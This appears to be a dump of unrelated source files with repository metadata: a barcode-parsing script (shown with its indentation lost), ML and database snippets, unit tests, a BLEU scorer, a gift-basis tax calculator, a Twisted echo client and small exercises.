assert str(ISMN('International Standard Music Number M-345-12345-8')) == 'ISMN M-3451-2345-8'
assert str(ISMN('9790345123458')) == 'ISMN M-3451-2345-8'
assert ISMN('ISMN 979 0 123 45678 5').__str__(short = True) == 'M123456785'
assert ISMN('ISMN 979-0-123-45678-5').__str__(short = True) == 'M123456785'
assert ISMN('ISMN 979 0 299102349').__str__(short = True) == 'M299102349'
assert ISMN('ISMN 9790299102349').__str__(short = True) == 'M299102349'
assert ISMN('ISMN 979-0-321-76543-6').__str__(short = True) == 'M321765436'
assert ISMN('ISMN 979-0-321-76544-3').__str__(short = True) == 'M321765443'
assert ISMN('ISMN 979-0-321-76545-0').__str__(short = True) == 'M321765450'
assert ISMN('ISMN 979-0-321-76546-7').__str__(short = True) == 'M321765467'
assert ISMN('ISMN 979-0-321-76547-4').__str__(short = True) == 'M321765474'
assert ISMN('ISMN 979-0-321-76548-1').__str__(short = True) == 'M321765481'
assert ISMN('ISMN 979-0-321-76549-8').__str__(short = True) == 'M321765498'
assert ISMN('ISMN 979-0-321-76550-4').__str__(short = True) == 'M321765504'
assert ISMN('ISMN 979-0-321-76551-1').__str__(short = True) == 'M321765511'
assert ISMN('ISMN 979-0-345-12345-8').__str__(short = True) == 'M345123458'
assert ISMN('International Standard Music Number M-345-12345-8').__str__(short = True) == 'M345123458'
assert ISMN('International Standard Music Number 979-0-345-12345-8').__str__(short = True) == 'M345123458'
assert ISMN('9790345123458').__str__(short = True) == 'M345123458'
pass
def main(progname, infile = '-'):
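    # Reads one code per line from infile; a '[private]' prefix marks the code
    # as non-public.  Each line is tried against every supported code class and
    # all successful interpretations are printed (with autocorrect suggestions
    # on failure).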
    # Accept '-' for stdin, a filename string, or an already-open file object.
    if infile == '-':
        infile = sys.stdin
    elif isinstance(infile, basestring):
        infile = file(infile)
errors = 0
while True:
line = infile.readline()
if not line: break
line = line.strip()
if line:
public = True
if line[:len('[private]')] == '[private]':
line = line[len('[private]'):].strip()
public = False
pass
i = None
prev = None
for c in UPC8, ISBN, ISMN, ISSN, EAN8, UPC12, EAN13, EAN14, GTIN:
try:
try: i = c(line, public = public)
except: i = c(line)
pass
except:
try: j = c(line, autocorrect = True)
except:
try: j = c(line, autocorrect = True, public = False)
except: pass
else: print 'Perhaps you meant [private] %s?' % j
pass
else: print 'Perhaps you meant %s?' % j
else:
if prev is not None and prev == i:
print '==', `i`
print ' printed form =', str(i)
print ' short form =', i.__str__(short = True)
continue
if prev is not None: print '*** DIFFERS (AMBIGUOUS INPUT) ***' + '\n' + '!=',
print `i`
prev = i
print ' printed form =', str(i)
print ' short form =', i.__str__(short = True)
print ' public =', i.public
print ' gtin =', i.gtin
print ' gtin check digit =', i.gtincheck
print ' info =', `i.info`
print ' pack =', `i.pack`
print ' GTIN =', GTIN(i, public = public)
try: print ' ISSN = %s' % ISSN(i)
except: pass
try: print ' ISBN = %s' % ISBN(i)
except: pass
try: print ' ISMN = %s' % ISMN(i)
except: pass
try: print ' UPC E/UPC-8 = %s' % UPC8(i)
except: pass
try: print ' UPC A/UPC-12 = %s' % UPC12(i)
except: pass
try: print ' EAN-8 = %s' % EAN8(i)
except: pass
try: print ' EAN-13 = %s' % EAN13(i)
except: pass
try: print ' EAN-14 = %s' % EAN14(i)
except: pass
pass
pass
if i is None:
try: GTIN(line)
except Exception, e:
errors += 1
print e
pass
pass
pass
pass
return errors and 1 or 0
test()
if __name__ == '__main__': sys.exit(main(*(sys.argv)))
| [
"[email protected]"
] | |
527f3f6b2e59ae487d07bc1f27334d5ba63a8ff6 | eb2867c8ef92810fb0a76aa5fa9933cfba42d3de | /DL_HomeWork/DL_midterm_codings/u_toronto_csc321_winter2018.py | a2e3d6675c9eead5a172b8b76a40dbf99aa66367 | [] | no_license | thomas-liao/python_prac | 76bbaf988a21cdac8e932a272db8f5eddfc66a7f | 05c68f14c5d7b8bb202ab6dde22e0214b1cd4ee1 | refs/heads/master | 2020-04-23T00:48:33.306497 | 2019-02-27T03:46:40 | 2019-02-27T03:46:40 | 170,792,637 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 421 | py | import numpy as np
X = np.arange(15).reshape(5,3)
w = np.zeros((3, 1))
t = np.array([1,2,3,4,5])
t = np.reshape(t, (5, 1))
y_bar = np.dot(X, w) - t
# Gradient of the mean squared error for linear regression:
# single sample:  dL/dw = (y_i - t_i) * x_i
# all N samples (vectorized):  w_bar = X.T.dot(y_bar) / N,  with  y_bar = X.dot(w) - t
w_bar = np.dot(X.T, y_bar) / X.shape[0]
alpha = 0.01
w -= alpha * w_bar
print(w)
b = 0.0  # bias term; initialize it before the update below
b_bar = np.mean(y_bar)  # gradient of the loss w.r.t. the bias
b -= alpha * b_bar
| [
"[email protected]"
] | |
1fb0eac2c32fdf739ca1c6178dcee78561e16153 | 8cba955ce23f98e0a24dc8f8be04e305c4ba59ef | /model.py | 8f523915da7766efb21deaa5bbaee095b8367a84 | [] | no_license | amit20-meet/Y2L-Flask-Routing | 5ba3ae8c9631f18897faf6d7a794355ac9dd907a | 8ddac918a788bd68c065c9976487eb7f589b701a | refs/heads/master | 2020-09-14T17:58:14.881190 | 2019-12-12T14:59:42 | 2019-12-12T14:59:42 | 223,207,600 | 0 | 0 | null | 2019-11-21T15:41:05 | 2019-11-21T15:41:04 | null | UTF-8 | Python | false | false | 512 | py | from sqlalchemy import Column, Integer, String, Date, ForeignKey, Float, Boolean, DateTime
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
class Product(Base):
__tablename__ = 'products'
id = Column(Integer, primary_key=True)
name = Column(String)
price = Column(Float)
picture_link = Column(String)
class Cart(Base):
__tablename__ = 'carts'
    id = Column(Integer, primary_key=True)
id_cart = Column(Integer)
name_cart = Column(String)
price_cart = Column(Float)
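# Usage sketch (not part of the original file; the engine URL and session
# handling below are illustrative assumptions):
#   from sqlalchemy import create_engine
#   from sqlalchemy.orm import sessionmaker
#   engine = create_engine('sqlite:///store.db')
#   Base.metadata.create_all(engine)          # creates 'products' and 'carts'
#   session = sessionmaker(bind=engine)()
#   session.add(Product(name='mug', price=9.99, picture_link='mug.png'))
#   session.commit()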
| [
"[email protected]"
] | |
2c5e1e78f81d3c4f9a9b47f685b834307e66f8aa | 7a9f6e01c0450173a0a45bd70816a4be38021eda | /cliente/migrations/0009_auto_20151117_2109.py | a5f6d71b2be3d0455b483d4a777ab7235a44b6d6 | [] | no_license | ryujiin/lovizdigital | 6137726349e6bd1de866054ce37de90f783a3b38 | 9f14c83b976e1e47a2558b508396139145b67bf2 | refs/heads/master | 2021-01-10T03:54:41.460708 | 2016-10-14T02:10:32 | 2016-10-14T02:10:32 | 45,559,176 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 441 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cliente', '0008_auto_20151117_2054'),
]
operations = [
migrations.AlterField(
model_name='comentario',
name='producto',
field=models.ForeignKey(blank=True, to='catalogo.Producto', null=True),
),
]
| [
"[email protected]"
] | |
b682efa36350fb281b200657223293f02c8be285 | d6ca0b326f1bd0ce381c6db611f6331096bf4187 | /examples/example_18_many_runs.py | e04e292092de98147577f3188ad7b98029be7b6e | [
"BSD-3-Clause"
] | permissive | SmokinCaterpillar/pypet | aa35355d70e8f44be015313494376d993f645d80 | 3d454ac65f89e7833baaf89510f73c546e90d8f6 | refs/heads/develop | 2023-08-08T16:01:54.087819 | 2023-02-14T14:59:32 | 2023-02-14T14:59:32 | 12,901,526 | 89 | 22 | BSD-3-Clause | 2023-07-24T00:46:12 | 2013-09-17T17:06:00 | Python | UTF-8 | Python | false | false | 2,415 | py | """Exploring more than 20000 runs may slow down *pypet*.
HDF5 has problems handling nodes with more than 10000 children.
To overcome this problem, simply group your runs into buckets or sets
using the `$set` wildcard.
"""
__author__ = 'Robert Meyer'
import os # To allow file paths to work under Windows and Linux
from pypet import Environment
from pypet.utils.explore import cartesian_product
def multiply(traj):
"""Example of a sophisticated simulation that involves multiplying two values."""
z = traj.x * traj.y
# Since we perform many runs we will group results into sets of 1000 each
# using the `$set` wildcard
traj.f_add_result('$set.$.z', z, comment='Result of our simulation '
'sorted into buckets of '
'1000 runs each!')
def main():
# Create an environment that handles running
filename = os.path.join('hdf5','example_18.hdf5')
env = Environment(trajectory='Multiplication',
filename=filename,
file_title='Example_18_Many_Runs',
overwrite_file=True,
comment='Contains many runs',
multiproc=True,
use_pool=True,
freeze_input=True,
ncores=2,
wrap_mode='QUEUE')
# The environment has created a trajectory container for us
traj = env.trajectory
# Add both parameters
traj.f_add_parameter('x', 1, comment='I am the first dimension!')
traj.f_add_parameter('y', 1, comment='I am the second dimension!')
# Explore the parameters with a cartesian product, yielding 2500 runs
traj.f_explore(cartesian_product({'x': range(50), 'y': range(50)}))
# Run the simulation
env.run(multiply)
# Disable logging
env.disable_logging()
# turn auto loading on, since results have not been loaded, yet
traj.v_auto_load = True
# Use the `v_idx` functionality
traj.v_idx = 2042
print('The result of run %d is: ' % traj.v_idx)
# Now we can rely on the wildcards
print(traj.res.crunset.crun.z)
traj.v_idx = -1
# Or we can use the shortcuts `rts_X` (run to set) and `r_X` to get particular results
print('The result of run %d is: ' % 2044)
print(traj.res.rts_2044.r_2044.z)
if __name__ == '__main__':
main() | [
"[email protected]"
] | |
1eda218ffa2e3edd8b517b2eb124e9f95f1996c4 | c67831f476cb530fc0c26e0bf4258ce18e986749 | /backend/opsbot/command/argfilter/__init__.py | f929fa7ce2f64581dcd0d1bd5e2a4709dad4ffb0 | [
"MIT"
] | permissive | cz-qq/bk-chatbot | a3ce4b86452b3de0ff35430c1c85b91d6b23a3e6 | da37fb2197142eae32158cdb5c2b658100133fff | refs/heads/master | 2023-06-05T05:48:22.083008 | 2021-06-15T10:21:30 | 2021-06-15T10:21:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 931 | py | """
TencentBlueKing is pleased to support the open source community by making
蓝鲸智云PaaS平台社区版 (BlueKing PaaSCommunity Edition) available.
Copyright (C) 2017-2018 THL A29 Limited,
a Tencent company. All rights reserved.
Licensed under the MIT License (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
from typing import Optional
from opsbot.self_typing import Message_T
class ValidateError(ValueError):
def __init__(self, message: Optional[Message_T] = None):
self.message = message
| [
"[email protected]"
] | |
fc124f8b4453ed0ea2d82b9e548da280ea7e856d | 0cd09f64f7d42f60167c688a959ab1b4eec62caf | /sources/t06/t06ej03.py | 6e6fa34ed09a94cfe12c5ef1749df95a040a47e9 | [
"MIT"
] | permissive | workready/pythonbasic | 3d438250b2fce6b6d243f2a8a1f8c5ccc9734d8c | 59bd82caf99244f5e711124e1f6f4dec8de22141 | refs/heads/master | 2022-10-14T09:20:30.160865 | 2020-06-10T09:22:51 | 2020-06-10T09:22:51 | 270,270,853 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 287 | py | # Implementamos un constructor para nuestra clase, y dentro del constructor asignamos variables.
class MiClase:
def __init__(self, x, y):
# self.x y self.y son propias de la instancia, no compartidas
self.x = x
self.y = y
c = MiClase(7, 12)
print(c.x, c.y) | [
"[email protected]"
] | |
7a1a3bafcd8974fdc513d298fc7f66943334e152 | 974d04d2ea27b1bba1c01015a98112d2afb78fe5 | /test/legacy_test/test_mv_op.py | 14a4ada5727e896eb87ca2a3359b5f9f4e760a81 | [
"Apache-2.0"
] | permissive | PaddlePaddle/Paddle | b3d2583119082c8e4b74331dacc4d39ed4d7cff0 | 22a11a60e0e3d10a3cf610077a3d9942a6f964cb | refs/heads/develop | 2023-08-17T21:27:30.568889 | 2023-08-17T12:38:22 | 2023-08-17T12:38:22 | 65,711,522 | 20,414 | 5,891 | Apache-2.0 | 2023-09-14T19:20:51 | 2016-08-15T06:59:08 | C++ | UTF-8 | Python | false | false | 3,850 | py | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import numpy as np
from eager_op_test import OpTest
import paddle
from paddle.static import Program, program_guard
class TestMVOp(OpTest):
def setUp(self):
self.op_type = "mv"
self.python_api = paddle.mv
self.init_config()
self.inputs = {'X': self.x, 'Vec': self.vec}
self.outputs = {'Out': np.dot(self.x, self.vec)}
def test_check_output(self):
self.check_output()
def test_check_grad(self):
self.check_grad(['X', 'Vec'], 'Out')
def init_config(self):
self.x = np.random.random((2, 100)).astype("float64")
self.vec = np.random.random(100).astype("float64")
class TestMVAPI(unittest.TestCase):
def test_dygraph_api_out(self):
paddle.disable_static()
self.x_data = np.random.random((5, 100)).astype("float64")
self.x = paddle.to_tensor(self.x_data)
self.vec_data = np.random.random(100).astype("float64")
self.vec = paddle.to_tensor(self.vec_data)
z = paddle.mv(self.x, self.vec)
np_z = z.numpy()
z_expected = np.array(np.dot(self.x_data, self.vec_data))
np.testing.assert_allclose(np_z, z_expected, rtol=1e-05)
paddle.enable_static()
def test_static_graph(self):
for x_stop_gradient in [False, True]:
for vec_stop_gradient in [False, True]:
paddle.enable_static()
train_program = Program()
startup_program = Program()
self.input_x = np.random.rand(5, 100).astype("float64")
self.input_vec = np.random.rand(100).astype("float64")
with program_guard(train_program, startup_program):
data_x = paddle.static.data(
"x", shape=[5, 100], dtype="float64"
)
data_vec = paddle.static.data(
"vec", shape=[100], dtype="float64"
)
data_x.stop_gradient = x_stop_gradient
data_vec.stop_gradient = vec_stop_gradient
result_vec = paddle.mv(data_x, data_vec)
self.place = paddle.CPUPlace()
exe = paddle.static.Executor(self.place)
(res,) = exe.run(
feed={"x": self.input_x, "vec": self.input_vec},
fetch_list=[result_vec],
)
z_expected = np.array(np.dot(self.input_x, self.input_vec))
np.testing.assert_allclose(res, z_expected, rtol=1e-05)
class TestMVError(unittest.TestCase):
def test_input(self):
def test_shape():
paddle.enable_static()
self.input_x = np.random.rand(5, 100).astype("float64")
self.input_vec = np.random.rand(100).astype("float64")
data_x = paddle.static.data("x", shape=[5, 100], dtype="float64")
data_vec = paddle.static.data(
"vec", shape=[100, 2], dtype="float64"
)
result_vec = paddle.mv(data_x, data_vec)
self.assertRaises(ValueError, test_shape)
if __name__ == '__main__':
paddle.enable_static()
unittest.main()
| [
"[email protected]"
] | |
a80e5a089f37600ba430f6f29761a5e3e3bc6a52 | 4d4c197c49172549514af7845f2429772d0158c7 | /message/migrations/0003_delete_user_account.py | 6a1e9ea6b0bb8c49d85c29853a9aa0745e36b8ee | [] | no_license | vigneshhari/djangolife | 787147ca4195a9a066bf7fdf2f389435afc6cc0b | 1e3b7a6516e1b4fbb98117abec4fa166e6747250 | refs/heads/master | 2021-01-10T02:00:44.300142 | 2017-06-29T02:21:19 | 2017-06-29T02:21:19 | 48,617,422 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 325 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('message', '0002_auto_20151206_1835'),
]
operations = [
migrations.DeleteModel(
name='User_Account',
),
]
| [
"[email protected]"
] | |
32ded32756b1b4f4f83fa1014ca01a88bfcc0928 | 1131198c6d53eed5aeacb8af7cfd5e4664f924e5 | /suggestion_baselines/HRED-qs/multi_bleu.py | bc4f5c96ca8b749f2fd68872137f47f4ad8213ed | [
"MIT"
] | permissive | polaris79/mnsrf_ranking_suggestion | d9f2a889e1ccd7f9993594ac212b3a2853f1b7eb | 5bd241fb49f08fa4937539991e12e5a502d5a072 | refs/heads/master | 2020-03-11T23:15:24.019548 | 2018-04-14T16:41:07 | 2018-04-14T16:41:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,302 | py | from functools import reduce
from math import exp, log
from collections import Counter
def ngram_count(words, n):
if n <= len(words):
return Counter(zip(*[words[i:] for i in range(n)]))
return Counter()
def max_count(c1, c2):
return Counter({k: max(c1[k], c2[k]) for k in c1})
def min_count(c1, c2):
return Counter({k: min(c1[k], c2[k]) for k in c1})
def closest_min_length(candidate, references):
l0 = len(candidate)
return min((abs(len(r) - l0), len(r)) for r in references)[1]
def safe_log(n):
if n <= 0:
return -9999999999
return log(n)
def precision_n(candidate, references, n):
ref_max = reduce(max_count, [ngram_count(ref, n) for ref in references])
candidate_ngram_count = ngram_count(candidate, n)
total = sum(candidate_ngram_count.values())
correct = sum(reduce(min_count, (ref_max, candidate_ngram_count)).values())
score = (correct / total) if total else 0
return score, correct, total
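# bleu() below combines the clipped n-gram precisions p_n into the standard
# score:  BLEU = BP * exp((1/N) * sum_{n=1..N} log p_n),  with the brevity
# penalty  BP = 1 if c > r else exp(1 - r/c),  where c is the candidate length
# and r the closest reference length.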
def bleu(candidate, references, maxn=4):
    # precision_n returns (score, correct, total); only the score is needed here
    precs = [precision_n(candidate, references, n)[0] for n in range(1, maxn + 1)]
    # cap the brevity penalty at 1 when the candidate is longer than the reference
    bp = min(1.0, exp(1 - closest_min_length(candidate, references) / len(candidate)))
    return bp * exp(sum(safe_log(precs[n]) for n in range(maxn)) / maxn)
def tokenize(txt):
return txt.strip().split()
def tokenize_lower(txt):
return txt.strip().lower().split()
def multi_bleu(candidates, all_references, tokenize_fn=tokenize, maxn=4):
correct = [0] * maxn
total = [0] * maxn
cand_tot_length = 0
ref_closest_length = 0
for candidate, reference in zip(candidates, all_references):
candidate = tokenize_fn(candidate)
reference = [tokenize_fn(reference)]
cand_tot_length += len(candidate)
ref_closest_length += closest_min_length(candidate, reference)
for n in range(maxn):
sc, cor, tot = precision_n(candidate, reference, n + 1)
correct[n] += cor
total[n] += tot
precisions = [(correct[n] / total[n]) if correct[n] else 0 for n in range(maxn)]
if cand_tot_length < ref_closest_length:
brevity_penalty = exp(1 - ref_closest_length / cand_tot_length)
else:
brevity_penalty = 1
score = 100 * brevity_penalty * exp(
sum(safe_log(precisions[n]) for n in range(maxn)) / maxn)
prec_pc = [100 * p for p in precisions]
return score, prec_pc, brevity_penalty, cand_tot_length, ref_closest_length
def print_multi_bleu(candidates, all_references, tokenize_fn=tokenize, maxn=4):
score, precisions, brevity_penalty, cand_tot_length, ref_closest_length = multi_bleu(candidates, all_references,
tokenize_fn, maxn)
print("BLEU = {:.2f}, {:.1f}/{:.1f}/{:.1f}/{:.1f} "
"(BP={:.3f}, ratio={:.3f}, hyp_len={:d}, ref_len={:d})".format(
score, precisions[0], precisions[1], precisions[2], precisions[3],
brevity_penalty, cand_tot_length / ref_closest_length, cand_tot_length,
ref_closest_length))
if __name__ == "__main__":
candidates = ['my name']
all_references = ['your name']
print_multi_bleu(candidates, all_references)
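    # With this toy pair only the unigram 'name' overlaps, so the higher-order
    # precisions are zero and the printed score is BLEU = 0.00.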
| [
"[email protected]"
] | |
bf846570cdfda344627ed0134bc3cfe19b69e3b6 | 531be8455556ce2b1e171f71eb040fddd7eb7522 | /Chapter_4_5/gifts_calc.py | 15433eb8c94439a333675850b421dfd031bb4e4f | [] | no_license | tanc7/ACC_410_Tax_Calculator_Project | 8a8f206268b0fb69872d0cc7191e3e69a299dee6 | b6684f8a307f948dee653b7a81457d144866ba11 | refs/heads/master | 2021-01-23T16:19:55.737386 | 2017-07-11T00:32:28 | 2017-07-11T00:32:28 | 93,293,406 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,517 | py | from termcolor import colored
import os
import sys
import socket
import StringIO
import time
import operator
# os.chdir('/root/Documents/ACC_410_Exam_Calculator_Project')
os.chdir('/root/Documents/ACC_410_Exam_Calculator_Project/Chapter_4_5')
def red(string):
string = colored(string,'red',attrs=['bold'])
print string
return string
def green(string):
string = colored(string,'green',attrs=['bold'])
print string
return string
def yellow(string):
string = colored(string,'yellow',attrs=['bold'])
print string
return string
def cyan(string):
string = colored(string,'cyan',attrs=['bold'])
print string
return string
def go_back_main_menu_module():
os.system('python /root/Documents/ACC_410_Exam_Calculator_Project/Chapter_4_5/main.py')
return
def gift_basis_stock():
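    # Gift basis rules (US federal income tax), as implemented below:
    #   FMV >= donor's cost -> carryover basis for both gain and loss, and the
    #                          donor's holding period tacks on;
    #   FMV <  donor's cost -> gain basis = donor's cost, loss basis = FMV, and
    #                          the holding period starts at the date of the gift.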
timestr = time.strftime("%Y%m%d-%H%M%S")
donor_cost = float(raw_input(yellow('Enter the cost of the donor bought stock: ')).replace(',',''))
donor_fmv = float(raw_input(yellow('Enter the FMV of the stock currently, prior to being donated: ')).replace(',',''))
donor_holding_period = float(raw_input(yellow('Enter the holding period in months of the donated stock until the date of donation: ')).replace(',',''))
if donor_fmv < donor_cost:
donee_loss_basis = donor_fmv
donee_gain_basis = donor_cost
donee_holding_period = 'Date of receipt of the gift'
    else:  # FMV >= cost: carryover basis; also covers FMV == cost, which previously left these variables undefined
donee_gain_basis = donor_cost
donee_loss_basis = donor_cost
donee_holding_period = donor_holding_period
string_GAIN_basis = "Recipient's GAIN BASIS: " + str(donee_gain_basis)
green(string_GAIN_basis)
string_LOSS_basis = "Recipient's LOSS BASIS: " + str(donee_loss_basis)
yellow(string_LOSS_basis)
string_HOLDING_period = "Recipient's HOLDING PERIOD: " + str(donee_holding_period)
cyan(string_HOLDING_period)
saved_answer = './solutions/gift_calc_stock' + timestr + '.csv'
w = open(saved_answer,'a+')
w.write(string_GAIN_basis + '\n')
w.write(string_LOSS_basis + '\n')
w.write(string_HOLDING_period + '\n')
w.close()
main()
return
def depreciable_gift_property():
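    # Straight-line depreciation is used below: (basis - salvage) / useful life
    # per year; both the gain and the loss basis are reduced by the accumulated
    # depreciation before being reported.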
timestr = time.strftime("%Y%m%d-%H%M%S")
donor_basis = float(raw_input(yellow('Enter the DONOR basis in the donated property: ')).replace(',',''))
donor_fmv = float(raw_input(yellow('Enter the DONOR FMV in the donated property: ')).replace(',',''))
donor_useful_life = float(raw_input(yellow('Enter the DONOR remaining USEFUL LIFE in the donated property in YEARS: ')).replace(',',''))
    salvage_raw = raw_input(yellow('Enter the anticipated SALVAGE VALUE if any: ')).replace(',','')
donee_basis = donor_basis
donee_useful_life = donor_useful_life
    if donor_basis < donor_fmv:
        # appreciated property: carryover basis for both gain and loss,
        # matching the rule used in gift_basis_stock above
        donee_loss_basis = donor_basis
        donee_gain_basis = donor_basis
    else:
        # FMV at or below donor basis: gain basis carries over, loss basis is FMV
        donee_loss_basis = donor_fmv
        donee_gain_basis = donor_basis
    # float() on the raw answer would crash on blank input, so convert here
    if salvage_raw == '':
        salvage_value = 0.0
    else:
        salvage_value = float(salvage_raw)
    if salvage_value < 0:
        red('Error, salvage value cannot be negative')
        depreciable_gift_property()
        return
annual_depreciation_straight_line = (donee_basis - salvage_value) / donee_useful_life
years_passed = float(raw_input(yellow('Enter the number of YEARS that have passed: ')))
donee_loss_basis = donee_loss_basis - (annual_depreciation_straight_line * years_passed)
donee_gain_basis = donee_gain_basis - (annual_depreciation_straight_line * years_passed)
if donee_loss_basis <= 0:
donee_loss_basis = 0
if donee_gain_basis <= 0:
donee_gain_basis = 0
string_GAIN_basis = "DONEE'S GAIN BASIS: " + str(donee_gain_basis)
string_LOSS_basis = "DONEE'S LOSS BASIS: " + str(donee_loss_basis)
# string_HOLDING_period = "DONEE'S HOLDING PERIOD: " + str(donee_holding_period)
green(string_GAIN_basis)
red(string_LOSS_basis)
saved_answer = './solutions/depreciable_gift_property_solution' + timestr + '.csv'
w = open(saved_answer,'a+')
w.write(string_GAIN_basis + '\n')
w.write(string_LOSS_basis + '\n')
w.close()
main()
return
def deathbed_gifts(): # this one requires more reading to fully understand
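    # One-year rule as implemented below: if the donee dies within one year of
    # receiving the gift and the property passes back to the donor, the donor
    # keeps the original basis instead of an FMV-at-death basis (IRC sec. 1014(e)).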
    timestr = time.strftime("%Y%m%d-%H%M%S")
    offspring_donor_fmv = float(raw_input(yellow('Enter the FMV from the donor offspring: ')).replace(',',''))
offspring_donor_cost = float(raw_input(yellow('Enter the COST of the donated property to the donor: ')).replace(',',''))
offspring_donor_basis = float(raw_input(yellow('Enter the BASIS of the donated property from the donor: ')).replace(',',''))
donee_elder_time_living = float(raw_input(yellow('Enter the amount of years between when the donee lived and died (while holding the donated property): ')).replace(',',''))
donee_elder_fmv_death = float(raw_input(yellow('Enter the FMV of the property at time of death: ')).replace(',',''))
if 0 < donee_elder_time_living <= 1:
one_year_exception = True
else:
one_year_exception = False
if one_year_exception == True:
offspring_donor_basis = offspring_donor_basis
else:
offspring_donor_basis = donee_elder_fmv_death
    improvements_raw = raw_input(yellow('Enter the amounts of any improvements made to the property by the elder before death (and after receiving the donated property): ')).replace(',','')
    # float() would crash on a blank answer, so treat empty input as zero
    improvements_to_property_before_death = float(improvements_raw) if improvements_raw else 0.0
offspring_donor_basis = offspring_donor_basis + improvements_to_property_before_death
string_offspring_basis_after_bequeath = 'NEW BASIS FOR OFFSPRING UPON RECEIVING LAND BACK AFTER DONEE DIED: ' + str(offspring_donor_basis)
green(string_offspring_basis_after_bequeath)
saved_answer = './solutions/deathbed_gifts_solution' + timestr + '.csv'
w = open(saved_answer,'a+')
w.write(string_offspring_basis_after_bequeath + '\n')
w.close()
main()
return
def main():
print """
# 1. Gift basis on stock
# 2. Depreciable gift property
# 3. Deathbed gifts
"""
    opt_choice = float(raw_input(yellow('Enter an OPTION: ')))
if opt_choice == 0:
go_back_main_menu_module()
elif opt_choice == 1:
gift_basis_stock()
elif opt_choice == 2:
depreciable_gift_property()
elif opt_choice == 3:
deathbed_gifts()
else:
        red('You have entered an invalid option')
main()
return
main()
| [
"[email protected]"
] | |
e774524468621c8b62228ad9b5e4bf70b776f035 | 2c872fedcdc12c89742d10c2f1c821eed0470726 | /pbase/day06/jiangyi/day06/day05_exercise/narcissistic.py | cbe324dd1bb5e88bff78735f37f05917d091fbdb | [] | no_license | zuigehulu/AID1811 | 581c3c7a37df9fa928bc632e4891fc9bafe69201 | 10cab0869875290646a9e5d815ff159d0116990e | refs/heads/master | 2020-04-19T16:33:04.174841 | 2019-01-30T07:58:24 | 2019-01-30T07:58:24 | 168,307,918 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 946 | py | # 4. 算出 100 ~ 999 范围内的水仙花数(Narcissistic Number)
# A narcissistic number is an integer that equals the sum of the cubes of its
# hundreds, tens, and units digits
# e.g.:
#    153 = 1**3 + 5**3 + 3**3
# Answer:
#    153, 370, ....
# Method 1
# for x in range(100, 1000):
#     bai = x // 100  # hundreds digit
#     shi = x % 100 // 10  # tens digit
#     ge = x % 10  # units digit
#     if x == bai ** 3 + shi ** 3 + ge ** 3:
#         print(x)
# Method 2
# for x in range(100, 1000):
#     s = str(x)  # convert to string
#     bai = int(s[0])  # hundreds digit
#     shi = int(s[1])  # tens digit
#     ge = int(s[2])  # units digit
#     if x == bai ** 3 + shi ** 3 + ge ** 3:
#         print(x)
# Method 3
for bai in range(1, 10):
for shi in range(0, 10):
for ge in range(0, 10):
# print(bai, shi, ge)
x = bai * 100 + shi * 10 + ge
if x == bai ** 3 + shi ** 3 + ge ** 3:
print(x)
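# The brute-force digit loop prints the four three-digit narcissistic numbers:
# 153, 370, 371, 407.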
| [
"[email protected]"
] | |
54857f8ce1335c730dd6913435514bdd95f0ec4d | 6c1a3dc849b1d84271caad0133387c7001a9704f | /Sep05/client01.py | 9c05f4d7af4e730c40cfc31f06a6225b9e242ab8 | [] | no_license | tnaswin/PythonPractice | f6207a4cf560b45c09af2f82d7365d4f0d16afaf | 8c20fa35bdf65aaf8ec899c217c10ffc7d4d3d64 | refs/heads/master | 2020-06-11T08:53:35.190582 | 2019-06-26T13:41:18 | 2019-06-26T13:41:18 | 193,908,616 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,149 | py | from __future__ import print_function
from twisted.internet import task
from twisted.internet.defer import Deferred
from twisted.internet.protocol import ClientFactory
from twisted.protocols.basic import LineReceiver
class EchoClient(LineReceiver):
end = "End!"
def connectionMade(self):
self.sendLine("Hello")
self.sendLine("World!")
self.sendLine(self.end)
def lineReceived(self, line):
print("receive:", line)
if line == self.end:
self.transport.loseConnection()
class EchoClientFactory(ClientFactory):
protocol = EchoClient
def __init__(self):
self.done = Deferred()
def clientConnectionFailed(self, connector, reason):
print('connection failed:', reason.getErrorMessage())
self.done.errback(reason)
def clientConnectionLost(self, connector, reason):
print('connection lost:', reason.getErrorMessage())
self.done.callback(None)
def main(reactor):
factory = EchoClientFactory()
reactor.connectTCP('localhost', 8000, factory)
return factory.done
if __name__ == '__main__':
task.react(main)
| [
"[email protected]"
] | |
cf008626688c045892e245b893ca625d48b2fd94 | d237e2624a30007bf8b1934057cd667f54245d40 | /url_summary/__init__.py | 50505e275df54d5aea955fe1884dc157dd81ea47 | [
"MIT"
] | permissive | xidianwang412/url-summary | 8b64c6b374ecf155dd17de53c00eb4b9d2765177 | affb4a08d08d1c79d2df40cb318ae40d531e9583 | refs/heads/master | 2023-04-25T17:40:59.757519 | 2018-05-29T21:26:10 | 2018-05-29T21:26:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 54 | py | from .url_summary import get_summary, UrlSummaryResult | [
"[email protected]"
] | |
